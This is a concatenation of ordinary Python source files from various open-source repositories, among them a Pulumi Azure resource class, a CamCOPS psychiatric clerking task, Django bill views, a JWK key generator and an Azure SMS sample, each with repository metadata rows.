result = []
for cd in config.component_defs:
cpath = cd.path
if cpath.lower() in component_names_lower:
result.append(cd.component_id)
return result
def convert_field_values(field_values, mar, services):
"""Convert user passed in field value list to FieldValue PB, or labels."""
fv_list_add = []
fv_list_remove = []
fv_list_clear = []
label_list_add = []
label_list_remove = []
field_name_dict = {
fd.field_name: fd for fd in mar.config.field_defs}
for fv in field_values:
field_def = field_name_dict.get(fv.fieldName)
if not field_def:
logging.warning('Custom field %s of does not exist', fv.fieldName)
continue
if fv.operator == api_pb2_v1.FieldValueOperator.clear:
fv_list_clear.append(field_def.field_id)
continue
# Enum fields are stored as labels
if field_def.field_type == tracker_pb2.FieldTypes.ENUM_TYPE:
raw_val = '%s-%s' % (fv.fieldName, fv.fieldValue)
if fv.operator == api_pb2_v1.FieldValueOperator.remove:
label_list_remove.append(raw_val)
elif fv.operator == api_pb2_v1.FieldValueOperator.add:
label_list_add.append(raw_val)
else: # pragma: no cover
logging.warning('Unsupported field value operater %s', fv.operator)
else:
new_fv = field_helpers.ParseOneFieldValue(
mar.cnxn, services.user, field_def, fv.fieldValue)
if fv.operator == api_pb2_v1.FieldValueOperator.remove:
fv_list_remove.append(new_fv)
elif fv.operator == api_pb2_v1.FieldValueOperator.add:
fv_list_add.append(new_fv)
else: # pragma: no cover
logging.warning('Unsupported field value operater %s', fv.operator)
return (fv_list_add, fv_list_remove, fv_list_clear,
label_list_add, label_list_remove)
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
0b5493b2e903ebb798213959fd1101e12390742e | 9f5557fd6a1d809e7026e23d58f3da57a0c0cbcc | /vega/service/user_service.py | 82ae4a5a0971b198ec36c76d8d8a0e8f7daf8b9d | [] | no_license | biao111/learn_python2 | e5150b7bb7cdd0166330ff159d83a809ca9d81d7 | 60f8fc1f7da8ae22dae2314b55dbe669b404d95a | refs/heads/master | 2023-01-07T16:56:42.123504 | 2020-11-08T05:53:10 | 2020-11-08T05:53:10 | 310,993,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,230 | py | from db.user_dao import UserDao
class UserService:
__user_dao = UserDao()
#验证用户登录
def login(self,username,password):
result = self.__user_dao.login(username,password)
return result
#查询角色
def search_user_role(self,username):
role = self.__user_dao.search_user_role(username)
return role
# 添加用户
def insert_user(self, username, password, email, role_id):
self.__user_dao.insert_user(username, password, email, role_id)
# 查询用户列表
def search_list(self, page):
result = self.__user_dao.search_list(page)
return result
# 查询用户总页数
def search_count_page(self):
count_page = self.__user_dao.search_count_page()
return count_page
#修改用户信息
def update_user(self,username,password,email,role_id,id):
self.__user_dao.update_user(username,password,email,role_id,id)
# 删除用户信息
def delete_by_id(self, id):
self.__user_dao.delete_by_id(id)
#查询用户ID
def search_userid(self,username):
userid = self.__user_dao.search_userid(username)
return userid
| [
"18211149974@163.com"
] | 18211149974@163.com |
8287dba7a61531a7caacf4b6d203bf647d570660 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/operationsmanagement/management_configuration.py | 9fcbdda9e01fec5b6c281daa72b730ae9185a220 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,608 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ManagementConfigurationArgs', 'ManagementConfiguration']
@pulumi.input_type
class ManagementConfigurationArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
management_configuration_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input['ManagementConfigurationPropertiesArgs']] = None):
"""
The set of arguments for constructing a ManagementConfiguration resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group to get. The name is case insensitive.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[str] management_configuration_name: User Management Configuration Name.
:param pulumi.Input['ManagementConfigurationPropertiesArgs'] properties: Properties for ManagementConfiguration object supported by the OperationsManagement resource provider.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if location is not None:
pulumi.set(__self__, "location", location)
if management_configuration_name is not None:
pulumi.set(__self__, "management_configuration_name", management_configuration_name)
if properties is not None:
pulumi.set(__self__, "properties", properties)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group to get. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="managementConfigurationName")
def management_configuration_name(self) -> Optional[pulumi.Input[str]]:
"""
User Management Configuration Name.
"""
return pulumi.get(self, "management_configuration_name")
@management_configuration_name.setter
def management_configuration_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "management_configuration_name", value)
@property
@pulumi.getter
def properties(self) -> Optional[pulumi.Input['ManagementConfigurationPropertiesArgs']]:
"""
Properties for ManagementConfiguration object supported by the OperationsManagement resource provider.
"""
return pulumi.get(self, "properties")
@properties.setter
def properties(self, value: Optional[pulumi.Input['ManagementConfigurationPropertiesArgs']]):
pulumi.set(self, "properties", value)
class ManagementConfiguration(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
management_configuration_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[pulumi.InputType['ManagementConfigurationPropertiesArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The container for solution.
API Version: 2015-11-01-preview.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[str] management_configuration_name: User Management Configuration Name.
:param pulumi.Input[pulumi.InputType['ManagementConfigurationPropertiesArgs']] properties: Properties for ManagementConfiguration object supported by the OperationsManagement resource provider.
:param pulumi.Input[str] resource_group_name: The name of the resource group to get. The name is case insensitive.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ManagementConfigurationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The container for solution.
API Version: 2015-11-01-preview.
:param str resource_name: The name of the resource.
:param ManagementConfigurationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ManagementConfigurationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
management_configuration_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[pulumi.InputType['ManagementConfigurationPropertiesArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ManagementConfigurationArgs.__new__(ManagementConfigurationArgs)
__props__.__dict__["location"] = location
__props__.__dict__["management_configuration_name"] = management_configuration_name
__props__.__dict__["properties"] = properties
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:operationsmanagement/v20151101preview:ManagementConfiguration")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ManagementConfiguration, __self__).__init__(
'azure-native:operationsmanagement:ManagementConfiguration',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ManagementConfiguration':
"""
Get an existing ManagementConfiguration resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ManagementConfigurationArgs.__new__(ManagementConfigurationArgs)
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
return ManagementConfiguration(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output['outputs.ManagementConfigurationPropertiesResponse']:
"""
Properties for ManagementConfiguration object supported by the OperationsManagement resource provider.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| [
"noreply@github.com"
] | bpkgoud.noreply@github.com |
55d3dc367b251fb1c170bfef1057404c2ca9ef36 | 6b29dbfe527d9e1950d53fde913e05e2a58758ab | /server/tasks/psychiatricclerking.py | caa5891fab78b1c238c1181e21bf8b1e2a48cc8f | [
"Apache-2.0"
] | permissive | parijatsahai/camcops | d7b2843b77bedee87b8298138bc8a33fe66c5178 | 09c7000060b546ad22b908e4245b1ff02940dd63 | refs/heads/master | 2021-01-21T09:20:43.670032 | 2015-07-02T15:42:59 | 2015-07-02T15:42:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,976 | py | #!/usr/bin/python2.7
# -*- encoding: utf8 -*-
"""
Copyright (C) 2012-2015 Rudolf Cardinal (rudolf@pobox.com).
Department of Psychiatry, University of Cambridge.
Funded by the Wellcome Trust.
This file is part of CamCOPS.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pythonlib.rnc_web as ws
from cc_modules.cc_string import WSTRING
from cc_modules.cc_task import (
CLINICIAN_FIELDSPECS,
STANDARD_TASK_FIELDSPECS,
Task,
)
# =============================================================================
# PsychiatricClerking
# =============================================================================
class PsychiatricClerking(Task):
FIELDSPEC_A = CLINICIAN_FIELDSPECS
FIELDSPEC_B = [
dict(name="location", cctype="TEXT"),
dict(name="contact_type", cctype="TEXT"),
dict(name="reason_for_contact", cctype="TEXT"),
dict(name="presenting_issue", cctype="TEXT"),
dict(name="systems_review", cctype="TEXT"),
dict(name="collateral_history", cctype="TEXT"),
]
FIELDSPEC_C = [
dict(name="diagnoses_psychiatric", cctype="TEXT"),
dict(name="diagnoses_medical", cctype="TEXT"),
dict(name="operations_procedures", cctype="TEXT"),
dict(name="allergies_adverse_reactions", cctype="TEXT"),
dict(name="medications", cctype="TEXT"),
dict(name="recreational_drug_use", cctype="TEXT"),
dict(name="family_history", cctype="TEXT"),
dict(name="developmental_history", cctype="TEXT"),
dict(name="personal_history", cctype="TEXT"),
dict(name="premorbid_personality", cctype="TEXT"),
dict(name="forensic_history", cctype="TEXT"),
dict(name="current_social_situation", cctype="TEXT"),
]
FIELDSPEC_MSE = [
dict(name="mse_appearance_behaviour", cctype="TEXT"),
dict(name="mse_speech", cctype="TEXT"),
dict(name="mse_mood_subjective", cctype="TEXT"),
dict(name="mse_mood_objective", cctype="TEXT"),
dict(name="mse_thought_form", cctype="TEXT"),
dict(name="mse_thought_content", cctype="TEXT"),
dict(name="mse_perception", cctype="TEXT"),
dict(name="mse_cognition", cctype="TEXT"),
dict(name="mse_insight", cctype="TEXT"),
]
FIELDSPEC_PE = [
dict(name="physical_examination_general", cctype="TEXT"),
dict(name="physical_examination_cardiovascular", cctype="TEXT"),
dict(name="physical_examination_respiratory", cctype="TEXT"),
dict(name="physical_examination_abdominal", cctype="TEXT"),
dict(name="physical_examination_neurological", cctype="TEXT"),
]
FIELDSPEC_D = [
dict(name="assessment_scales", cctype="TEXT"),
dict(name="investigations_results", cctype="TEXT"),
]
FIELDSPEC_E = [
dict(name="safety_alerts", cctype="TEXT"),
dict(name="risk_assessment", cctype="TEXT"),
dict(name="relevant_legal_information", cctype="TEXT"),
]
FIELDSPEC_F = [
dict(name="current_problems", cctype="TEXT"),
dict(name="patient_carer_concerns", cctype="TEXT"),
dict(name="impression", cctype="TEXT"),
dict(name="management_plan", cctype="TEXT"),
dict(name="information_given", cctype="TEXT"),
]
for fslist in [FIELDSPEC_B, FIELDSPEC_C,
FIELDSPEC_MSE, FIELDSPEC_PE,
FIELDSPEC_D, FIELDSPEC_E, FIELDSPEC_F]:
for d in fslist:
d["comment"] = d["name"]
# DO NOT write to FIELDSPEC_A like this, because that overwrite
# CLINICIAN_FIELDSPECS.
@classmethod
def get_tablename(cls):
return "psychiatricclerking"
@classmethod
def get_taskshortname(cls):
return "Clerking"
@classmethod
def get_tasklongname(cls):
return "Psychiatric clerking"
@classmethod
def get_fieldspecs(cls):
return (
STANDARD_TASK_FIELDSPECS
+ PsychiatricClerking.FIELDSPEC_A
+ PsychiatricClerking.FIELDSPEC_B
+ PsychiatricClerking.FIELDSPEC_C
+ PsychiatricClerking.FIELDSPEC_MSE
+ PsychiatricClerking.FIELDSPEC_PE
+ PsychiatricClerking.FIELDSPEC_D
+ PsychiatricClerking.FIELDSPEC_E
+ PsychiatricClerking.FIELDSPEC_F
)
def get_ctv_heading(self, wstringname):
return {
"heading": ws.webify(WSTRING(wstringname)),
"skip_if_no_content": False
}
def get_ctv_subheading(self, wstringname):
return {
"subheading": ws.webify(WSTRING(wstringname)),
"skip_if_no_content": False
}
def get_ctv_description_content(self, x):
return {
"description": ws.webify(WSTRING(x)),
"content": ws.webify(getattr(self, x))
}
def get_clinical_text(self):
FIELDS_B = [x["name"] for x in PsychiatricClerking.FIELDSPEC_B]
FIELDS_C = [x["name"] for x in PsychiatricClerking.FIELDSPEC_C]
FIELDS_MSE = [x["name"] for x in PsychiatricClerking.FIELDSPEC_MSE]
FIELDS_PE = [x["name"] for x in PsychiatricClerking.FIELDSPEC_PE]
FIELDS_D = [x["name"] for x in PsychiatricClerking.FIELDSPEC_D]
FIELDS_E = [x["name"] for x in PsychiatricClerking.FIELDSPEC_E]
FIELDS_F = [x["name"] for x in PsychiatricClerking.FIELDSPEC_F]
dictlist = []
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_current_contact"))
for x in FIELDS_B:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_background"))
for x in FIELDS_C:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_examination_investigations"))
dictlist.append(self.get_ctv_subheading("mental_state_examination"))
for x in FIELDS_MSE:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_subheading("physical_examination"))
for x in FIELDS_PE:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_subheading(
"assessments_and_investigations"))
for x in FIELDS_D:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_risk_legal"))
for x in FIELDS_E:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_summary_plan"))
for x in FIELDS_F:
dictlist.append(self.get_ctv_description_content(x))
return dictlist
def is_complete(self):
return True
def heading(self, wstringname):
return u'<div class="heading">{}</div>'.format(WSTRING(wstringname))
def subheading(self, wstringname):
return u'<div class="subheading">{}</div>'.format(WSTRING(wstringname))
def subsubheading(self, wstringname):
return u'<div class="subsubheading">{}</div>'.format(
WSTRING(wstringname))
def subhead_text(self, fieldname):
return self.subheading(fieldname) + u'<div><b>{}</b></div>'.format(
ws.webify(getattr(self, fieldname))
)
def subsubhead_text(self, fieldname):
return self.subsubheading(fieldname) + u'<div><b>{}</b></div>'.format(
ws.webify(getattr(self, fieldname))
)
def get_task_html(self):
# Avoid tables - PDF generator crashes if text is too long.
# FIELDS_A = [x["name"] for x in PsychiatricClerking.FIELDSPEC_A]
FIELDS_B = [x["name"] for x in PsychiatricClerking.FIELDSPEC_B]
FIELDS_C = [x["name"] for x in PsychiatricClerking.FIELDSPEC_C]
FIELDS_MSE = [x["name"] for x in PsychiatricClerking.FIELDSPEC_MSE]
FIELDS_PE = [x["name"] for x in PsychiatricClerking.FIELDSPEC_PE]
FIELDS_D = [x["name"] for x in PsychiatricClerking.FIELDSPEC_D]
FIELDS_E = [x["name"] for x in PsychiatricClerking.FIELDSPEC_E]
FIELDS_F = [x["name"] for x in PsychiatricClerking.FIELDSPEC_F]
html = self.get_standard_clinician_block()
# for x in FIELDS_A:
# html += self.subsubhead_text(x)
html += self.heading("psychiatricclerking_heading_current_contact")
for x in FIELDS_B:
html += self.subhead_text(x)
html += self.heading("psychiatricclerking_heading_background")
for x in FIELDS_C:
html += self.subhead_text(x)
html += self.heading(
"psychiatricclerking_heading_examination_investigations")
html += self.subheading("mental_state_examination")
for x in FIELDS_MSE:
html += self.subsubhead_text(x)
html += self.subheading("physical_examination")
for x in FIELDS_PE:
html += self.subsubhead_text(x)
for x in FIELDS_D:
html += self.subhead_text(x)
html += self.heading("psychiatricclerking_heading_risk_legal")
for x in FIELDS_E:
html += self.subhead_text(x)
html += self.heading("psychiatricclerking_heading_summary_plan")
for x in FIELDS_F:
html += self.subhead_text(x)
return html
| [
"rudolf@pobox.com"
] | rudolf@pobox.com |
bce6b7949363087074d3daaff106c143744040a5 | aa81ba4d6ae20dee412acb24b5ee0eccb502767f | /venv/bin/jwk_create.py | 35c37f0a49523cc2709765191324b825386ec5fa | [] | no_license | CarlosGonzalezLuzardo/SECAS | 32c3e0b9c176333d2c20b7b3fed3adc9de8c0216 | 4455de4eb61fb4bddf6cfa8a4ce9e5f9f8e9d812 | refs/heads/master | 2020-03-14T11:11:33.922067 | 2018-06-14T10:54:14 | 2018-06-14T10:54:14 | 131,585,370 | 0 | 2 | null | 2018-05-08T13:51:43 | 2018-04-30T11:00:45 | Python | UTF-8 | Python | false | false | 1,300 | py | #!/home/alejandro/Proyectos/SECAS/Internals/derimanfranco/py-multifactor/venv/bin/python
import json
from Cryptodome.PublicKey import RSA
import argparse
import os
from jwkest.jwk import RSAKey
__author__ = 'rolandh'
def create_and_store_rsa_key_pair(name="pyoidc", path=".", size=1024):
key = RSA.generate(size)
keyfile = os.path.join(path, name)
f = open("%s.key" % keyfile, "w")
f.write(key.exportKey("PEM"))
f.close()
f = open("%s.pub" % keyfile, "w")
f.write(key.publickey().exportKey("PEM"))
f.close()
rsa_key = RSAKey(key=key)
rsa_key.serialize()
# This will create JWK from the public RSA key
jwk_spec = json.dumps(rsa_key.to_dict(), "enc")
f = open(keyfile + ".jwk", "w")
f.write(str(jwk_spec))
f.close()
return key
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-n', dest="name", default="pyoidc",
help="file names")
parser.add_argument('-p', dest="path", default=".",
help="Path to the directory for the files")
parser.add_argument('-s', dest="size", default=1024,
help="Key size", type=int)
args = parser.parse_args()
create_and_store_rsa_key_pair(args.name, args.path, args.size)
| [
"carlos.gonzalez@edosoft.es"
] | carlos.gonzalez@edosoft.es |
1f7e38df13d990b7710695bc820c7e9bb278fe64 | a554605ff97c7b688f457a8493d521d2c54101a3 | /scripts/ratatosk_run.py | 83c4c4149ac0757140b8531bb94696f183e417ec | [
"Apache-2.0"
] | permissive | SciLifeLab/ratatosk | 9c0c9b15cc0bf1c515bb5144f38ada3dd02e9610 | 4e9c9d8dc868b19a7c70eb7b326422c87bc3d7c0 | refs/heads/master | 2020-12-25T09:57:52.696398 | 2013-03-25T13:42:36 | 2013-03-25T13:42:36 | 8,794,985 | 0 | 0 | null | 2013-03-25T13:43:17 | 2013-03-15T08:36:17 | Python | UTF-8 | Python | false | false | 850 | py | import luigi
import os
import sys
import ratatosk.lib.align.bwa
import ratatosk.lib.tools.gatk
import ratatosk.lib.tools.samtools
import ratatosk.lib.tools.picard
from ratatosk.pipeline.haloplex import HaloPlex
from ratatosk.pipeline.align import AlignSeqcap
from ratatosk.pipeline import config_dict
if __name__ == "__main__":
if len(sys.argv) > 1:
task = sys.argv[1]
else:
task = None
if task == "HaloPlex":
args = sys.argv[2:] + ['--config-file', config_dict['haloplex']]
luigi.run(args, main_task_cls=ratatosk.pipeline.haloplex.HaloPlex)
elif task == "AlignSeqcap":
args = sys.argv[2:] + ['--config-file', config_dict['seqcap']]
luigi.run(args, main_task_cls=ratatosk.pipeline.align.AlignSeqcap)
# Whatever other task/config the user wants to run
else:
luigi.run()
| [
"per.unneberg@scilifelab.se"
] | per.unneberg@scilifelab.se |
1fbde5a70e2caec3b5424736dc0badecdc100998 | 12ec7d731a465e43ad211235882e2939cc5c031d | /bills/views.py | b359ced2a2b590bdfc286341744e1b28bc9da6a3 | [] | no_license | munikarmanish/merojob-bill | 770101e3c42be46569f26037d5e012065aa94392 | 882dd2aeafd1030f38d2d679268607b48c6a84aa | refs/heads/master | 2021-01-19T05:41:44.926766 | 2017-01-15T05:27:09 | 2017-01-15T05:27:09 | 78,848,703 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,658 | py | from django.contrib.auth.mixins import LoginRequiredMixin
from django.urls import reverse_lazy
from django.views import generic
from clients.models import Client
from .forms import BillForm
from .models import Bill
class CreateView(LoginRequiredMixin, generic.edit.CreateView):
template_name = 'bills/bill_form.html'
model = Bill
form_class = BillForm
success_url = reverse_lazy('bills:list')
def get_context_data(self, **kwargs):
context = super(CreateView, self).get_context_data(**kwargs)
context['page_title'] = 'Add bill'
return context
def get_initial(self):
initial = super(CreateView, self).get_initial()
# Check if client is already given
client_id = self.request.GET.get('client_id')
if client_id:
try:
initial['client'] = Client.objects.get(id=client_id)
except Client.DoesNotExist:
pass
return initial
class UpdateView(LoginRequiredMixin, generic.edit.UpdateView):
template_name = 'bills/bill_form.html'
model = Bill
form_class = BillForm
success_url = reverse_lazy('bills:list')
def get_context_data(self, **kwargs):
context = super(UpdateView, self).get_context_data(**kwargs)
context['page_title'] = 'Edit bill'
return context
class DeleteView(LoginRequiredMixin, generic.edit.DeleteView):
model = Bill
success_url = reverse_lazy('bills:list')
class ListView(generic.ListView):
template_name = 'bills/bill_list.html'
context_object_name = 'bills'
def get_queryset(self):
return Bill.objects.order_by('-created')
| [
"munikarmanish@gmail.com"
] | munikarmanish@gmail.com |
8d4f206ec3a0026c9b1da9c8a234299dde23340e | fb1ea456040a36037c3be87ffdc51dc3d8aaa7bb | /setup.py | 3e2e04ec60eb274e3400eb0d1b155cd61204cfe3 | [
"MIT"
] | permissive | rpatterson/python-main-wrapper | badfb894afe7980afb261bda9d3ce84af39e8a10 | eb549cee920bf144c4021632f7784b7d425b6c40 | refs/heads/master | 2023-09-05T04:26:53.052777 | 2021-09-21T18:45:00 | 2021-09-21T18:45:00 | 259,238,110 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,905 | py | """
main wrapper foundation or template, distribution/package metadata.
"""
import setuptools
with open("README.rst", "r") as readme:
LONG_DESCRIPTION = readme.read()
tests_require = ["six", 'contextlib2;python_version<"3"']
setuptools.setup(
name="main-wrapper",
author="Ross Patterson",
author_email="me@rpatterson.net",
description=(
"Set up global environment and run another script within, "
"ala pdb, profile, etc.."
),
long_description=LONG_DESCRIPTION,
long_description_content_type="text/x-rst",
url="https://github.com/rpatterson/python-main-wrapper",
license="MIT",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Utilities",
],
python_requires=">=2.7",
packages=setuptools.find_packages("src"),
package_dir={"": "src"},
use_scm_version=dict(
write_to="src/mainwrapper/version.py",
local_scheme="no-local-version",
),
setup_requires=[
'setuptools_scm;python_version>="3"',
# BBB: Python 2.7 compatibility
'setuptools_scm<6;python_version<"3"',
],
install_requires=["six", 'pathlib2;python_version<"3"'],
tests_require=tests_require,
extras_require=dict(
dev=tests_require
+ [
"pytest",
"pre-commit",
"coverage",
"flake8",
"autoflake",
"autopep8",
'flake8-black;python_version>="3"',
"rstcheck",
]
),
entry_points=dict(console_scripts=["python-main-wrapper=mainwrapper:main"]),
)
| [
"me@rpatterson.net"
] | me@rpatterson.net |
1e1adf50d4442520f05210a93462a543e4675b11 | 8ca19f1a31070738b376c0370c4bebf6b7efcb43 | /office365/sharepoint/gtp/base_request_options.py | 85faaf6e47d578df5eec240a8462c7370a7235db | [
"MIT"
] | permissive | vgrem/Office365-REST-Python-Client | 2ef153d737c6ed5445ba1e446aeaec39c4ef4ed3 | cbd245d1af8d69e013c469cfc2a9851f51c91417 | refs/heads/master | 2023-09-02T14:20:40.109462 | 2023-08-31T19:14:05 | 2023-08-31T19:14:05 | 51,305,798 | 1,006 | 326 | MIT | 2023-08-28T05:38:02 | 2016-02-08T15:24:51 | Python | UTF-8 | Python | false | false | 110 | py | from office365.runtime.client_value import ClientValue
class BaseGptRequestOptions(ClientValue):
""""""
| [
"vvgrem@gmail.com"
] | vvgrem@gmail.com |
f03ceb97b4ae1e32b9355c096ce23972956537e2 | 1a166165ab8287d01cbb377a13efdb5eff5dfef0 | /sdk/communication/azure-communication-sms/samples/send_sms_to_multiple_recipients_sample.py | 6254d388103c13c07088107f6e0a113ee9601b20 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | manoj0806/azure-sdk-for-python | 7a14b202ff80f528abd068bf50334e91001a9686 | aab999792db1132232b2f297c76800590a901142 | refs/heads/master | 2023-04-19T16:11:31.984930 | 2021-04-29T23:19:49 | 2021-04-29T23:19:49 | 363,025,016 | 1 | 0 | MIT | 2021-04-30T04:23:35 | 2021-04-30T04:23:35 | null | UTF-8 | Python | false | false | 2,093 | py | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE: send_sms_to_multiple_recipients_sample.py
DESCRIPTION:
This sample demonstrates sending an SMS message to multiple recipients. The SMS client is
authenticated using a connection string.
USAGE:
python send_sms_to_multiple_recipients_sample.py
Set the environment variable with your own value before running the sample:
1) AZURE_COMMUNICATION_SERVICE_CONNECTION_STRING - the connection string in your ACS account
"""
import os
import sys
from azure.communication.sms import SmsClient
sys.path.append("..")
class SmsMultipleRecipientsSample(object):
connection_string = os.getenv("AZURE_COMMUNICATION_SERVICE_CONNECTION_STRING")
phone_number = os.getenv("AZURE_COMMUNICATION_SERVICE_PHONE_NUMBER")
def send_sms_to_multiple_recipients(self):
sms_client = SmsClient.from_connection_string(self.connection_string)
# calling send() with sms values
sms_responses = sms_client.send(
from_=self.phone_number,
to=[self.phone_number, self.phone_number],
message="Hello World via SMS",
enable_delivery_report=True, # optional property
tag="custom-tag") # optional property
for sms_response in sms_responses:
if (sms_response.successful):
print("Message with message id {} was successful sent to {}"
.format(sms_response.message_id, sms_response.to))
else:
print("Message failed to send to {} with the status code {} and error: {}"
.format(sms_response.to, sms_response.http_status_code, sms_response.error_message))
if __name__ == '__main__':
sample = SmsMultipleRecipientsSample()
sample.send_sms_to_multiple_recipients()
| [
"noreply@github.com"
] | manoj0806.noreply@github.com |
9f3aba0a3fae8aebb7bce9c64a27e7c4c956ea66 | 480d67d9a3d0dfacc3cf8103450dae1669a52d9e | /setup.py | 42aa82870668e6346f68ebd84546f18e48abbd35 | [] | no_license | alenzhao/probabilistic2020 | 3045261e8855b959e50357edd7533ec4af5b5294 | f748fad88e50e5229eb765ac59cf731a734e22e2 | refs/heads/master | 2021-01-12T17:58:40.989527 | 2016-10-12T19:46:52 | 2016-10-12T19:46:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,029 | py | #from distutils.core import setup
from setuptools import setup
from distutils.extension import Extension
import sys
# fix problems with pythons terrible import system
import os
file_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(file_dir, 'prob2020/cython'))
SRC_DIR = 'prob2020'
if '--use-cython' in sys.argv:
USE_CYTHON = True
sys.argv.remove('--use-cython')
else:
USE_CYTHON = False
import numpy as np
ext = '.pyx' if USE_CYTHON else '.cpp'
extensions = [
Extension(SRC_DIR + ".cython.uniform_kde",
[SRC_DIR +'/cython/uniform_kde'+ext],
language='c++',
